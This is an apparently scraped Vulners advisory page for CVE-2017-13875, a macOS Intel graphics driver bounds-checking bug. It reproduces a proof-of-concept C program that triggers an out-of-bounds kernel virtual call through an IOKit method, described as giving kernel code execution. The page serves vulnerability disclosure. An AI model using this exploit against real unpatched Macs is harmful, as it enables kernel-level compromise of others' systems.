Vulners
Lucene search
MacOS kernel code execution due to lack of bounds checking in AppleIntelCapriController::GetLinkConfig(CVE-2017-13875)
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | macOS - Kernel Code Execution due to Lack of Bounds Checking in AppleIntelCapriController::GetLinkCo | 13 Dec 201700:00 | ā | zdt |
 | macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown) | 10 Apr 201900:00 | ā | nessus |
| macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown) | 7 Dec 201700:00 | ā | nessus |
 | About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan | 6 Dec 201700:00 | ā | apple |
| About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan - Apple Support | 27 Jul 202008:21 | ā | apple |
 | CVE-2017-13875 | 12 Dec 201700:00 | ā | circl |
 | Apple macOS High Sierra Intel Graphics Driver Out-of-Bounds Read Vulnerability | 7 Dec 201700:00 | ā | cnvd |
 | CVE-2017-13875 | 25 Dec 201721:00 | ā | cve |
 | CVE-2017-13875 | 25 Dec 201721:00 | ā | cvelist |
 | EUVD-2017-5390 | 7 Oct 202500:30 | ā | euvd |
10
// ianbeer
// build: clang -o capri_link_config capri_link_config.c -framework IOKit
#if 0
MacOS kernel code execution due to lack of bounds checking in AppleIntelCapriController::GetLinkConfig
AppleIntelCapriController::GetLinkConfig trusts a user-supplied value in the structure input which it uses to index
a small table of pointers without bounds checking. The OOB-read pointer is passed to AppleIntelFramebuffer::validateDisplayMode
which will read a pointer to a C++ object from that buffer (at offset 2138h) and call a virtual method allowing trivial kernel code execution.
Tested on MacOS 10.13 (17A365) on MacBookAir5,2
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <IOKit/IOKitLib.h>
int main(int argc, char** argv){
kern_return_t err;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IntelFBClientControl"));
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), 0, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 0;
char inputStruct[4096];
size_t inputStructCnt = 8;
//*(uint64_t*)inputStruct = 0x12345678; // crash
*(uint64_t*)inputStruct = 0x37; // oob call
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 4096;
err = IOConnectCallMethod(
conn,
0x921, // GetLinkConfig
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
return 0;
}
Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Dec 2017 00:00Current
7.7High risk
Vulners AI Score7.7
EPSS0.01266